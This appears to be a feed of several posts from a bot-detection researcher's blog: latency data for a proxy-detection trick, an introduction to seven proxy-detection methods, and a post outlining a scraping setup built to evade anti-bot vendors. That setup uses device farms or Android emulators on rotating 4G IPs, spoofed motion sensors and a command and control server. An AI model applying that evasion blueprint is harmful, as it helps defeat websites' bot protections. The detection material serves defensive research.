<span class="nx">measureImageLatenciesFetch</span><span class="p">(</span><span class="nx">url</span><span class="p">).</span><span class="nx">then</span><span class="p">((</span><span class="nx">latencies</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">url</span><span class="p">,</span> <span class="nx">latencies</span><span class="p">)</span>
<span class="p">});</span>
<span class="p">}</span>
</code></pre></div>
<h4>No Proxy Server</h4>
<p>When I do <strong>not</strong> use a proxy with my Google Chrome browser, I get the following latencies:</p>
<div class="highlight"><pre><span></span><code>https://0.0.0.0: [21.9, 21.6, 22, 21.6, 21.3]
https://127.0.0.1: [23.4, 22.9, 22.4, 22, 26.3]
https://167.99.241.135: [65.6, 64.3, 75.5, 77.3, 79.8]
</code></pre></div>
<p><strong>Observation:</strong> The <code>0.0.0.0</code> latencies are in the same range as the <code>127.0.0.1</code> latencies.</p>
<h4>With Proxy Server</h4>
<p>However, when I start my chrome browser with a local forwarding proxy server (which in turn uses a remote SOCKS5 upstream proxy) with the command</p>
<div class="highlight"><pre><span></span><code>chromium-browser --proxy-server<span class="o">=</span>http://localhost:8947 https://incolumitas.com
</code></pre></div>
<p>I obtain the following latencies:</p>
<div class="highlight"><pre><span></span><code>https://127.0.0.1: [36.9, 37, 38.3, 37.9, 37.4]
https://0.0.0.0: [262.6, 264.8, 325.1, 327.2, 330.4]
https://167.99.241.135: [379.2, 407.9, 410.3, 424, 428.8]
</code></pre></div>
<p><strong>Observation:</strong> It can be seen that the <code>0.0.0.0</code> latencies are significantly higher than the <code>127.0.0.1</code> latencies and that the <code>0.0.0.0</code> latencies are in the same range as the <code>167.99.241.135</code> latencies.</p>
<h4>With VPN enabled</h4>
<p>And when I use a VPN server (with my Android Smartphone and OpenVPN Connect), this is what I obtain:</p>
<div class="highlight"><pre><span></span><code>https://127.0.0.1: [15, 21, 24, 24]
https://0.0.0.0: [18, 18, 24, 24]
https://167.99.241.135: [81, 85, 86, 87]
</code></pre></div>
<p><strong>Observation:</strong> No discrepancy when using VPN.</p>
<h3>More Data from the real World</h3>
<p>Because I record visitors on my <a href="https://bot.incolumitas.com/proxy_detect.html">Proxy/VPN Detection page</a> I managed to collect some real world data to confirm whether this method works. In most of the below cases, I had sufficient grounds to believe that the visitors are in fact using a proxy, since <a href="https://incolumitas.com/2021/10/16/7-different-ways-to-detect-proxies/">other proxy detection tests</a> showed an indication for proxy usage:</p>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">330.7</span><span class="p">,</span>
<span class="mf">334.4</span><span class="p">,</span>
<span class="mf">339.8</span><span class="p">,</span>
<span class="mf">351.5</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">24</span><span class="p">,</span>
<span class="mf">24.9</span><span class="p">,</span>
<span class="mf">22.4</span><span class="p">,</span>
<span class="mf">21.5</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">525.1</span><span class="p">,</span>
<span class="mf">1145.5</span><span class="p">,</span>
<span class="mf">1161.8</span><span class="p">,</span>
<span class="mf">4161.2</span>
<span class="p">],</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">320.8</span><span class="p">,</span>
<span class="mf">323.8</span><span class="p">,</span>
<span class="mf">328.5</span><span class="p">,</span>
<span class="mf">331</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">13.8</span><span class="p">,</span>
<span class="mf">14.6</span><span class="p">,</span>
<span class="mf">14.8</span><span class="p">,</span>
<span class="mf">17.5</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">789</span><span class="p">,</span>
<span class="mf">793.7</span><span class="p">,</span>
<span class="mf">796.5</span><span class="p">,</span>
<span class="mf">798.4</span>
<span class="p">],</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">138.2</span><span class="p">,</span>
<span class="mf">138.5</span><span class="p">,</span>
<span class="mf">143.1</span><span class="p">,</span>
<span class="mf">143.3</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">3.6</span><span class="p">,</span>
<span class="mf">3.9</span><span class="p">,</span>
<span class="mf">3.9</span><span class="p">,</span>
<span class="mf">3.9</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">144</span><span class="p">,</span>
<span class="mf">144.2</span><span class="p">,</span>
<span class="mf">144.3</span><span class="p">,</span>
<span class="mf">145.2</span>
<span class="p">],</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">138.8</span><span class="p">,</span>
<span class="mf">143.5</span><span class="p">,</span>
<span class="mf">144</span><span class="p">,</span>
<span class="mf">144.4</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">3.6</span><span class="p">,</span>
<span class="mf">3.8</span><span class="p">,</span>
<span class="mf">3.8</span><span class="p">,</span>
<span class="mf">3.9</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">137.8</span><span class="p">,</span>
<span class="mf">142.8</span><span class="p">,</span>
<span class="mf">143.6</span><span class="p">,</span>
<span class="mf">145.1</span>
<span class="p">],</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">209.2</span><span class="p">,</span>
<span class="mf">210.3</span><span class="p">,</span>
<span class="mf">251.4</span><span class="p">,</span>
<span class="mf">252</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">4.3</span><span class="p">,</span>
<span class="mf">4.6</span><span class="p">,</span>
<span class="mf">4.7</span><span class="p">,</span>
<span class="mf">4.8</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">351.3</span><span class="p">,</span>
<span class="mf">357.6</span><span class="p">,</span>
<span class="mf">409.9</span><span class="p">,</span>
<span class="mf">410.1</span>
<span class="p">],</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">646.5</span><span class="p">,</span>
<span class="mf">662.5</span><span class="p">,</span>
<span class="mf">663.1</span><span class="p">,</span>
<span class="mf">665.2</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">4</span><span class="p">,</span>
<span class="mf">4</span><span class="p">,</span>
<span class="mf">4.3</span><span class="p">,</span>
<span class="mf">4.3</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">337.5</span><span class="p">,</span>
<span class="mf">343.9</span><span class="p">,</span>
<span class="mf">350.4</span><span class="p">,</span>
<span class="mf">351.1</span>
<span class="p">],</span>
</code></pre></div>
<h4>Bad Data / Rubbish</h4>
<p>Then again, sometimes I recorded very weird data on otherwise normal browsers. Why are the latencies so huge? I could not find an explanation. First, I assumed that maybe the JavaScript main thread was slow, so I removed every other JavaScript code, but I still got sometimes weird large latency measurements.</p>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">5.4</span><span class="p">,</span>
<span class="mf">5.3</span><span class="p">,</span>
<span class="mf">5</span><span class="p">,</span>
<span class="mf">5.1</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">2004.4</span><span class="p">,</span>
<span class="mf">2004.3</span><span class="p">,</span>
<span class="mf">2004.7</span><span class="p">,</span>
<span class="mf">2006.4</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">3420.8</span><span class="p">,</span>
<span class="mf">3486.6</span><span class="p">,</span>
<span class="mf">3485.6</span><span class="p">,</span>
<span class="mf">3486.5</span>
<span class="p">],</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">3.4</span><span class="p">,</span>
<span class="mf">3.3</span><span class="p">,</span>
<span class="mf">3.2</span><span class="p">,</span>
<span class="mf">3.1</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">2017.3</span><span class="p">,</span>
<span class="mf">2017.3</span><span class="p">,</span>
<span class="mf">2017.1</span><span class="p">,</span>
<span class="mf">2017</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">2206.9</span><span class="p">,</span>
<span class="mf">2240.6</span><span class="p">,</span>
<span class="mf">2240.6</span><span class="p">,</span>
<span class="mf">2241</span>
<span class="p">],</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">3</span><span class="p">,</span>
<span class="mf">3</span><span class="p">,</span>
<span class="mf">3</span><span class="p">,</span>
<span class="mf">2.9</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">2032.1</span><span class="p">,</span>
<span class="mf">2031.7</span><span class="p">,</span>
<span class="mf">2048.1</span><span class="p">,</span>
<span class="mf">2048.3</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">2272.2</span><span class="p">,</span>
<span class="mf">2329.2</span><span class="p">,</span>
<span class="mf">2329.9</span><span class="p">,</span>
<span class="mf">2330.2</span>
<span class="p">],</span>
</code></pre></div>
<p>And absolutely rubbish such as:</p>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">393.2</span><span class="p">,</span>
<span class="mf">413.6</span><span class="p">,</span>
<span class="mf">2472.2</span><span class="p">,</span>
<span class="mf">2876.9</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">2048</span><span class="p">,</span>
<span class="mf">2047.9</span><span class="p">,</span>
<span class="mf">2048.6</span><span class="p">,</span>
<span class="mf">2048.5</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">396.6</span><span class="p">,</span>
<span class="mf">4074</span><span class="p">,</span>
<span class="mf">4468.9</span><span class="p">,</span>
<span class="mf">7171.9</span>
<span class="p">],</span>
</code></pre></div>
<h4>Somewhat Rubbish Data</h4>
<p>And then there are cases where I just don't know what to say.</p>
<p>I am quite confident that this latency measurement is from a browser that uses a proxy (Again, mostly because of <a href="https://incolumitas.com/2021/10/16/7-different-ways-to-detect-proxies/">other proxy detection tests</a>):</p>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">95.2</span><span class="p">,</span>
<span class="mf">95.2</span><span class="p">,</span>
<span class="mf">95.5</span><span class="p">,</span>
<span class="mf">96.3</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">2031.7</span><span class="p">,</span>
<span class="mf">2047.3</span><span class="p">,</span>
<span class="mf">2048</span><span class="p">,</span>
<span class="mf">2047.8</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">182.4</span><span class="p">,</span>
<span class="mf">182.9</span><span class="p">,</span>
<span class="mf">183.6</span><span class="p">,</span>
<span class="mf">183</span>
<span class="p">],</span>
</code></pre></div>
<p>The <code>0.0.0.0</code> are too large and in a similar range than the <code>167.99.241.135</code> latencies. But the <code>127.0.0.1</code> latencies are just unreasonably huge?! Like WTF?</p>
<h2>Help Needed</h2>
<p>Do you think my suggested method to detect proxies does work? I need your help!</p>
<p>Why are latencies to <code>0.0.0.0</code> significantly larger than latencies to <code>127.0.0.1</code> when using a SOCKS / HTTP proxy?</p>
<p>Maybe because the browser routes requests to <code>0.0.0.0</code> to the upstream proxy but requests to <code>127.0.0.1</code> not? The only way to find out would be to take a look at the Chrome proxy implementation, which is used when Chrome is invoked with the command line flag <code>chromium-browser --proxy-server=http://localhost:8947</code>.</p>So you want to Scrape like the Big Boys? 🚀2021-11-03T23:48:00+01:002021-11-04T10:30:00+01:00Nikolai Tschachertag:incolumitas.com,2021-11-03:/2021/11/03/so-you-want-to-scrape-like-the-big-boys/<p>What it really takes to scrape without getting detected.</p><h2>Intro</h2>
<p>Let's do some thinking, shall we?</p>
<p>When I used to run a scraping service, I managed to scrape at most a couple of million Google SERPs per week. But I never ever purchased proxies from proxy providers such as <a href="https://brightdata.com/">Brightdata</a>, <a href="https://packetstream.io/">Packetstream</a> or <a href="https://oxylabs.io/">Oxylabs</a>.</p>
<p>Why? </p>
<p>Because I could not fully trust the other customers with whom I shared the proxy bandwidth. What if I share proxy servers with criminals that do more malicious stuff than the somewhat innocent SERP scraping?</p>
<p>Full disclosure: Non-DoS scraping of public information is okay for me. Ad-fraud, social media spam, web attacks such as automated SQL injections or XSS is not.</p>
<p>Furthermore, those proxy services are quite <em>pricey</em>, and me being a stingy German, I didn't possibly see a reasonable way for this combination to work out.</p>
<figure>
<img src="https://incolumitas.com/images/work different.png" alt="farm man" />
<figcaption>It had to be said.</figcaption>
</figure>
<p>So how did I manage to scrape millions of Google SERP's?</p>
<p>I used <a href="https://aws.amazon.com/lambda/">AWS Lambda</a>, put Headless Chrome into an <a href="https://aws.amazon.com/getting-started/hands-on/run-serverless-code/">AWS Lambda function</a> and used <a href="https://github.com/berstend/puppeteer-extra">puppeteer-extra</a> and <a href="https://github.com/alixaxel/chrome-aws-lambda">chrome-aws-lambda</a> to create a function that automatically launches a browser for 300 seconds that I can solely use for scraping.</p>
<p>Actually, I could have probably achieved the same with plain <code>curl</code>, because Google really doesn't put too much effort into blocking bots from their own search engine (they mostly rate limit by IP). But I needed a full browser for other projects, so there was that.</p>
<p>Anyhow, AWS gives you access to 16 regions all around the world (are they offering even more regions in the meantime?) and after three AWS Lambda function invocations, your function obtains a new public IP address. And if you concurrently invoke 1000 Lambda functions, you will bottom out at around 250 public IP addresses. And then you have 16 regions, which gives you around <code>16 * 250 = 4000</code> public IP addresses at any time when using AWS Lambda. This was enough to be able to scrape millions of Google SERPs / week, even when sharing public datacenter IP addresses.</p>
<p>I tried the same with <a href="https://cloud.google.com/">Google Cloud Platform</a>, but funnily enough, Google blocks their own cloud infrastructure much more aggressively compared to traffic from AWS.</p>
<p>(This was all in 2019 and 2020, things possibly changed)</p>
<p><strong>But I digress.</strong></p>
<p>The above setup is not good. It will work for scraping Google / Bing / Amazon, because they <em>want</em> to be scraped to a certain extent.</p>
<p>But it will never work against well protected websites that employ protection from anti bot companies such as <a href="https://datadome.co/">DataDome</a>, <a href="https://www.akamai.com/">Akamai</a> or <a href="https://www.imperva.com/">Imperva</a> (there are more anti bot companies, don't be salty when I didn't name you, okay?).</p>
<p>Those companies employ ill-adjusted individuals that do nothing else than look for the most recent techniques to fingerprint browsers, find out if a browser <a href="https://github.com/abrahamjuliot/creepjs">lies about it's own configuration</a> or exhibits artifacts that don't pertain to a humanly controlled browser. When normal people are out drinking beers in the pub on Friday night, these individuals invent increasingly bizarre ways to fingerprint browsers and detect bots ;)</p>
<ol>
<li><a href="https://www.usenix.org/system/files/conference/woot14/woot14-ho.pdf">Browser Red Pills - Dan Boneh - Awesome Paper</a> </li>
<li><a href="https://incolumitas.com/2021/01/10/browser-based-port-scanning/">Browser Based Port Scanning</a></li>
<li><a href="https://research.google/pubs/pub45581/">Google Picasso</a></li>
<li><a href="https://browserleaks.com/fonts">Font Fingerprinting</a></li>
<li><a href="https://github.com/NikolaiT/zardaxt">TCP/IP Fingerprinting - zardaxt.py</a></li>
<li><a href="https://en.wikipedia.org/wiki/Proof_of_work">Browser based Crypto Challenges - Proof of Work</a></li>
<li>Generic Browser Fingerprinting</li>
<li><a href="https://github.com/salesforce/ja3">TLS Fingerprinting</a></li>
<li>WebGL Fingerprinting</li>
<li>WebRTC real IP detection</li>
<li><a href="https://incolumitas.com/2021/04/11/bot-detection-with-behavioral-analysis/">Behavioral Classification</a></li>
<li><a href="https://incolumitas.com/2021/02/05/why-does-this-website-know-i-am-sitting-on-the-toilet/">Gyroscope API querying (device movement / rotation detection)</a></li>
<li><a href="https://fingerprintjs.com/blog/disabling-javascript-wont-stop-fingerprinting/">Fingerprinting without JavaScript using HTTP headers, CSS feature queries and Fonts.</a></li>
<li>...</li>
</ol>
<p>I kid you not, there are millions of different ways to detect if a browser is being controlled by a bot or not. It's insanely complex and almost all bot architectures are to a degree vulnerable to detection.</p>
<p>Maybe I am just not a good enough bot developer myself, but I think it's harder to create a good bot than to detect a bot. The real problem for anti bot companies is to reduce the false positive rate, not detecting most bots.</p>
<p>The main reason that makes bots prone to detection is simple economics: In order to scrape millions of pages, bot programmers put their browsers into docker containers and orchestrate them with docker swarm. Others use Kubernetes to orchestrate scraping clusters. And of course they will use cloud providers such as Hetzner, AWS or Digitalocean to host their bots. Nobody uses their MacBook Pro to run 20 Chrome Docker images over night. </p>
<p>The above described architecture is highly non-humanlike. What sane human being is browsing Instagram from within a docker container on a Hetzner VPS?!</p>
<p>Let's propose a scraping architecture that is not that easily detectable.</p>
<h2>An undetectable and scalable scraping infrastructure</h2>
<p>First let's proclaim the two laws of successful scraping: </p>
<ol>
<li>The second most important rule about evading anti bot companies is: <strong>You shall not lie about your browser configuration</strong>.</li>
<li>And the most important rule is: <strong>You shall only lie about your browser configuration if nobody catches you</strong>.</li>
</ol>
<p>Because I am not that good at reverse engineering those <a href="https://incolumitas.com/data/imperva.js">heavily obfuscated fingerprinting libraries</a> from anti bot companies, my suggestion is to just use real devices for scraping.</p>
<figure>
<img src="https://incolumitas.com/images/shelf_closeup_790x.jpg" alt="phones man" />
<figcaption>Device Farm (Source: https://github.com/DeviceFarmer/stf)</figcaption>
</figure>
<p>If I would try to create a <em>undetectable</em> scraping service, I would probably buy 500 <a href="https://www.zdnet.com/article/best-phone-under-100/">cheap Android devices</a> (Starting at 58$ per device), maybe from 5 different manufacturers. We want diversity after all for fingerprinting reasons! You can also buy old (but more powerful) Android devices. If you buy 100 devices at once, you'll get a massive discount. </p>
<p>Then I would buy cheap data plans for the devices and I would control the devices with <a href="https://github.com/DeviceFarmer/stf">DeviceFarmer/stf</a> and rent some cheap storage space (With a mobile cellular antenna closeby) in five top major cities of the world such as London, Paris, Boston, Frankfurt and Los Angeles and put 100 phones in there each.</p>
<p>Then I install the lightweight Android Go on each device, throw out everything unnecessary that bloats my device and then plug it into a power source. Every 5 minutes I turn on/off airplane mode so my phone gets another IP address from the <a href="https://en.wikipedia.org/wiki/Carrier-grade_NAT">4G carrier grade NAT</a>.</p>
<p>Mobile IP addresses (4G, 5G, LTE) are practically un-bannable, because they are shared by up to hundred thousands of legitimate users in major cities. Instagram will never dare to ban 200.000 people in LA just because of some pesky spammers use the same IP! When Carrier Grade NATs were designed, <a href="https://www.ofcom.org.uk/__data/assets/pdf_file/0020/37802/cgnat.pdf">the designers knew about this issue</a>:</p>
<blockquote>
<p>In the event that an IPv4 address is blocked or blacklisted as a source of spam, the impact on a
CGN would be greater, potentially affecting an entire subscriber base. This would increase cost
and support load for the ISP, and, as we have seen earlier, damage its IP reputation.</p>
</blockquote>
<p>Do you think IPv6 comes to a rescue? Think again! Most anti bot companies give little to no IP reputation to IPv6 addresses, because the address space is so insanely vast.</p>
<p>One problem with the setup described above is that I will need to spoof those pesky <code>deviceorientation</code> and <code>devicemotion</code> <a href="https://developer.mozilla.org/en-US/docs/Web/Events/Detecting_device_orientation">JavaScript events</a> on a kernel level, because no real device is laying on the ground without rotation/movement all day long. Every website can access rotation and velocity data from Android data without asking for permission. So we have to spoof that.</p>
<p>But apart from that, I cannot see a way how bot detection systems are going to block this scraping infrastructure.</p>
<p>Of course the downsides are apparent: </p>
<ol>
<li>I have to buy 500 Android devices. I own already three of those things, I would go ballistic with 500 of them.</li>
<li>I need to rent storage space in major cities. That's expensive.</li>
<li>I need people in 5 cities to fix problems in the device farms.</li>
<li>I have to deal with hardware. I hate that. It causes problems non stop.</li>
</ol>
<p>So that would be a larger project, probably costing thousands of dollars in maintenance.</p>
<h3>Improvement: Emulate Android</h3>
<p>Instead of buying real Android devices, it would be better to emulate Android devices with Android emulators such as </p>
<ul>
<li><a href="https://www.android-x86.org/documentation/virtualbox.html">Android-x86 on VirtualBox</a></li>
<li><a href="https://www.bluestacks.com/de/index.html">bluestacks</a></li>
<li>Or the <a href="https://developer.android.com/studio/run/emulator">Android Studio Emulator</a></li>
</ul>
<p>Obviously, here we play with the devil again because we want to cut costs!</p>
<p>How are those pesky anti bot companies going to find out that we are emulating Android devices?</p>
<ol>
<li>An idea is to use browser based red pills that reveal that the browser is running in an emulated environment</li>
<li>Maybe they will launch <a href="https://incolumitas.com/2021/01/10/browser-based-port-scanning/">browser based port scans</a> against well known ports that are only running on emulated Android devices (such as <code>adb</code> service)?</li>
<li>Maybe Google sets some device wide <a href="https://support.google.com/googleplay/android-developer/answer/6048248?hl=en">advertisement ID's</a> on each mobile device? If this ID is missing or always stays the same, it could be a sign of suspicion.</li>
<li>Every website can find out whether you are logged into a Gmail or YouTube account with <a href="https://browserleaks.com/social">Social Media Login Detection</a>. No logged in Google account on Android equals suspicion!</li>
<li>There are probably 1000 more techniques that can be used to detect emulated Android devices</li>
</ol>
<p>Most likely, the Android emulators are imperfect and this imperfection is exhibited over the massive JavaScript API that each mobile browser offers to every website.</p>
<p>I am absolutely in favour of the emulation approach. This would mean that we only have to own several powerful servers, plug <a href="https://proxidize.com/">4G dongles into them</a> and we are ready to go. It could look like this (The image is taken from <a href="https://proxidize.com/">proxidize.com</a>): </p>
<figure>
<img src="https://incolumitas.com/images/MicrosoftTeams-image-33.png.webp" alt="phones man" />
<figcaption>A couple of 4G dongles that I use for my personal E-Mail checking and writing Whatsapp messages (Source: https://proxidize.com/gallery/)</figcaption>
</figure>
<p>What <a href="https://proxidize.com/">proxidize.com</a> is doing is offering 4G mobile proxies. I don't want proxies, because <a href="https://bot.incolumitas.com/proxy_detect.html">proxies are detectable by itself</a>. I want to directly use the 4G dongle from the Android emulator! No latency due to geographical discrepancy between Android emulator and proxy.</p>
<p>So in the end, the scraping infrastructure could look like this:</p>
<ol>
<li>Install one powerful scraping server with 50 4G dongles connected to it in one geographical location</li>
<li>For each scraping server, run 50-100 emulated Android devices.</li>
<li>Put this scraping station in 5 major cities.</li>
<li>A simple command & control server orchestrates the 5 scraping stations.</li>
<li>Profit.</li>
</ol>7 different ways to detect Proxies2021-10-16T12:46:00+02:002021-10-25T18:46:00+02:00Nikolai Tschachertag:incolumitas.com,2021-10-16:/2021/10/16/7-different-ways-to-detect-proxies/<p>In this blog post, I demonstrate 7 different efficient ways how to detect a proxy server when the client is visiting a web server with a browser that has a proxy / VPN configured.</p><p><a
class="orange_button"
href="https://bot.incolumitas.com/proxy_detect.html">
Visit the Proxy/VPN Detection Page
</a></p>
<h2>Introduction</h2>
<p>In the past couple of months, I have been writing a lot about bot detection and proxy detection.</p>
<p>For example, I wrote a blog article about <a href="https://incolumitas.com/2021/06/07/detecting-proxies-and-vpn-with-latencies/">proxy detection using latency measurements</a> that leverages two different latency measurements, one taken with WebSocket messages from the browser, the other looking at the latencies of the incoming three-way TCP/IP handshake on the server side. The rough idea is: If the statistical median of the two measurements differ significantly, there could be a proxy sitting between the browser and the web server.</p>
<p>But why is proxy detection important in IT security and bot detection? In order to understand that, it's important to see why your IP address bears so much weight in bot detection:</p>
<ol>
<li>The IP address is the unique piece of entropy that tells your communication partners where they have to send their packets in order to speak to you.</li>
<li>Usually, your ISP assigns an IP address to you. It doesn't matter if you are using a home modem/router or a mobile phone with a SIM card that grants you access to a mobile carrier network. In the end, your ISP connects you to the Internet and your host will be identified uniquely by your IP address. Your ISP knows at any moment in time which customer (by your name, address and passport copy that you provided upon registration) is associated to which IP address.</li>
<li>The basic assumption web services can make about a private customers IP address is that a relatively small group of end users use the same IP address. However, this is not necessarily the case with mobile 3G or 4G <a href="https://en.wikipedia.org/wiki/Carrier-grade_NAT">Carrier-grade NATs</a>.</li>
<li>A very important security property of IP addresses is that they are <a href="https://en.wikipedia.org/wiki/IP_address_spoofing">hard to spoof</a>: While there is no technical limitation that prevents you from changing the source address of your IP packets, <em>smart</em> routers and Intrusion Detection Systems (IDS) on the routing path will drop spoofed packets by using methods such as <a href="https://en.wikipedia.org/wiki/Ingress_filtering">ingress</a> or <a href="https://en.wikipedia.org/wiki/Egress_filtering">egress</a> filtering. Furthermore, the TCP three-way handshake won't event work with hosts that spoof source IP addresses.</li>
<li>All the above properties give web service providers some confidence that IP addresses are usually shared by a relatively small group of people and that real human beings will not send more network packets than a certain threshold. Put differently: You can stop bots by counting how many requests per time period you received from a certain IP address. If an IP address exceeds that threshold, you rate limit them or serve them a CAPTCHA.</li>
</ol>
<figure>
<img src="https://incolumitas.com/images/IPv4_Packet-en.svg.png" alt="IPv4_Packet" />
<figcaption>The IPv4 packet header, because it's so beautiful
<span style="font-size: 70%">(Source: <a href="https://en.wikipedia.org/wiki/IPv4#Header">https://en.wikipedia.org/wiki/IPv4#Header</a>)</span>
</figcaption>
</figure>
<h2>The Attacker Model</h2>
<p>The basic scenario is as follows: A scraper developed a bot and tries to scrape many pages of a huge website. Because the website is programmed in React, the scraper decided to use a real browser for his scraping endeavours instead of relying on <code>curl</code>.</p>
<p>All proxy detection tests in this blog article assume that the client is using the most recent Chrome browser with a http/s or socks proxy configured. You can achieve that by starting Chrome with the following shell command: <code>google-chrome --proxy-server="socks5://localhost:1080"</code> whereby <code>socks5://localhost:1080</code> could be any proxy server.</p>
<p>Furthermore, it is assumed that the Chrome browser comes configured as is, without any plugins or extensions active. JavaScript is enabled by default, as it should be.</p>
<p>The attacker model is as follows: The attacker has full control over a web server and lures the client into visiting the attacker's website (the proxy detection site), which will run the tests specified in this blog article.</p>
<p>Some of the tests rely upon JavaScript execution and transferring information back to the attacker's website by means such as the WebSocket or <a href="https://developer.mozilla.org/en-US/docs/Web/API/Navigator/sendBeacon">Navigator.sendBeacon()</a> JavaScript API's. </p>
<p>Of course, the client is able to alter and spoof any JavaScript logic, so if a proxy detection test relies exclusively on JavaScript / client side logic, it will be marked as such. This client side spoofing is often made harder by <a href="https://github.com/javascript-obfuscator/javascript-obfuscator">obfuscating and compressing JavaScript</a>.</p>
<p>Furthermore, time plays also a crucial role. If a detection test gives a result immediately, before even serving the <code>index.html</code> file, it's easier to put an stop to scraping. But some tests rely on complicated JavaScript logic, long after the web page has been served, which means that the scraper can be blocked only on subsequent requests to the website.</p>
<h2>General Notes for all Detection Tests</h2>
<p>I will not show source code for all the proxy detection tests in this blog article. Rather, I will link to my older blog articles in which I often provide the implementation. Where applicable, I will provide a link to GitHub projects with source code.</p>
<p>All proxy detection tests can be found on the following dedicated web site: </p>
<p><a
class="orange_button"
href="https://bot.incolumitas.com/proxy_detect.html">
Visit the Proxy/VPN Detection Page
</a></p>
<p>You can look at the source code of the client side proxy detection test when inspecting the page source code. </p>
<h2>1. Latency Test</h2>
<table>
<thead>
<tr>
<th>Test Property</th>
<th>Test Property Value</th>
</tr>
</thead>
<tbody>
<tr>
<td><em>Description</em></td>
<td>Compare latency from browser to server with the latency from web server to external IP address</td>
</tr>
<tr>
<td><em>Spoofable?</em></td>
<td>Yes, the latency measurements from browser to server are obtained with JavaScript and can be manipulated by the client.</td>
</tr>
<tr>
<td><em>Results Availability</em></td>
<td>~500 ms after <code>DOMContentLoaded</code></td>
</tr>
<tr>
<td><em>Accuracy</em></td>
<td>Depends on the geographical location of the proxy and it's latency.</td>
</tr>
</tbody>
</table>
<p>I created an in-depth description of the basic idea of this bot detection test in <a href="https://incolumitas.com/2021/06/07/detecting-proxies-and-vpn-with-latencies/">an earlier blog article</a>. The idea is to take two independent latency measurements:</p>
<ol>
<li><strong>Browser to Server Latency:</strong> Send <code>N=10</code> WebSocket messages from the browser to the web server. The web server immediately replies to each message with the same message (basic echo server). The browser stores the time delta as latency measurement.</li>
<li><strong>Server to Browser Latency:</strong> On the server, when the browser establishes a http connection, we measure the time delta in the initial three-way TCP/IP handshake between SYN, SYN+ACK and ACK packets.</li>
</ol>
<p>If both latency measurements differ significantly (namely the <strong>Browser to Server Latency</strong> is significantly higher than the <strong>Server to Browser Latency</strong>), it is possible to conjecture that there is an intermediate host between the browser and the web server.</p>
<p>The intermediate proxy server has only one purpose: It splits the TCP/IP connection between client and web-server into two separate TCP/IP connections, so that the web server only sees the source IP address of the proxy server!</p>
<ol>
<li>TCP/IP connection 1, from browser to proxy server</li>
<li>TCP/IP connection 2, from proxy server to web server</li>
</ol>
<p>Because this detour over the proxy server often incurs a geographical and application level delay, we are able to observe a difference in latencies!</p>
